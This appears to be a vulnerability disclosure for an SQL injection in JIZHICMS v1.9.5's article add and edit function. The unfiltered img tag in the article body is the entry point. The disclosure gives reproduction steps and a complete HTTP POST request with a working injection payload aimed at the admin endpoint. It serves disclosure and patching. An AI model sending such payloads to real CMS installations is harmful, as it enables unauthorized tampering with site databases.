brief introduction

SQL Injection vulnerability in JIZHICMS v1.9.5 via the add or edit article

Vulnerability Description:

On the article function side of JIZHICMS V1.9.5, when the picture is not set when the article is published, JIZHICMS will set the first img tag in the body as the article picture. In this acquisition process, the img tag parameters are not checked and filtered, so Caused SQL injection.

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/4bc29cf6-5179-4f3d-aba8-670aeddecbe7/Untitled.png

Recurrence:

Recurring environment:

  1. Open the article editing page to submit and then modify the data package

  2. Modify the modified litpic and body to the following values respectively and then send

litpic=''
body=<img+src%3d"http%3a//a.com/a.jpg',+title+%3d+version()+,+orders+%3d+'1"/>

payload

POST /admin.php/Article/editarticle.html HTTP/1.1
Host: jizhicms.test
Content-Length: 237
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: <http://jizhicms.test>
Referer: <http://jizhicms.test/admin.php/Article/editarticle/id/33.html>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=pjhk5trh72fq0eeobrn81bmba4
Connection: close

go=1&id=33&title=test&tid=2&seo_title=test&hits=0&keywords=&litpic=&file=&description=&orders=0&tags=&isshow=1&addtime=2021-06-27+22%3A14%3A16&target=&ownurl=&body=<img+src%3d"http%3a//a.com/a.jpg',+title+%3d+version()+,+orders+%3d+'1"/>